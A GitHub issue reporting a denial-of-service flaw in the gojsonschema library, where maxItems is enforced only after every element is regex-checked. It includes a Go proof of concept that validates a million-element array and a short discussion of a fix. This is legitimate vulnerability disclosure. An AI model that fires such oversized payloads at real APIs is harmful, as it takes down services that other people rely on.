Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

A DOS vulnerability exists in parameter validity check. #361

Open
Hissec opened this issue Mar 9, 2023 · 3 comments
Open

A DOS vulnerability exists in parameter validity check. #361

Hissec opened this issue Mar 9, 2023 · 3 comments

Comments

@Hissec
Copy link

Hissec commented Mar 9, 2023
edited
Loading

When verifying the validity of object parameters, gojsonschema will checked all of the parameters, one by one check every regular expression matching on it self parameter. Only After the check is complete, gojsonschema checks whether the number of parameters exceeds the maximum value specified by maxItems.

eg:When a list with 1000000 members is transferred, although the maximum number of parameters is set to 2, the system verifies the 1 million parameters one by one. In this process, a DoS vulnerability occurs and the system determines whether the total number of parameters exceeds the value of maxItems.

In the actual verification process, when attacker send the list parameters contains one million members for my api, only need 20 concurrent requests are required, my CPU had BOOM and my web service had Denial of service.
@Hissec
Copy link
Author

Hissec commented Mar 10, 2023

poc:
import (
"encoding/json"
"fmt"
"log"
"strings"
)
import "github.com/xeipuuv/gojsonschema"

func main() {
var Obj = map[string]interface{}{
"type": "array",
"minItems": 1,
"maxItems": 2,
"items": map[string]interface{}{
"type": "string",
"pattern": "^[a-z]+$",
},
}

num := 1000000 // The number of parameters from attacker input
var data = fmt.Sprintf(`[%s"a"]`, strings.Repeat(`"1",`, num))
if !validate(Obj, data) {
	fmt.Println("error!")
} else {
	fmt.Println("OK!")
}

}

// verifying the validity of object parameters
func validate(Obj map[string]interface{}, data string) bool {
ObjArr, err := json.Marshal(Obj)
if err != nil {
return false
}
ObjLoader := gojsonschema.NewStringLoader(string(ObjArr))
dataLoader := gojsonschema.NewStringLoader(data)
validateResult, _ := gojsonschema.Validate(ObjLoader, dataLoader)
if !validateResult.Valid() {
for _, desc := range validateResult.Errors() {
log.Printf("- %s\n", desc.String())
}
return false
} else {
return true
}
}

@ORESoftware
Copy link

you might have a point, except I think most usage of this library is not at runtime but test/checks before deploying?

@Hissec
Copy link
Author

Hissec commented Aug 13, 2024

This library is used in many projects to check API parameters. I suggest adding a switch to exit and return false if it fails once.
Defend against network attacks from DOS

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@ORESoftware @Hissec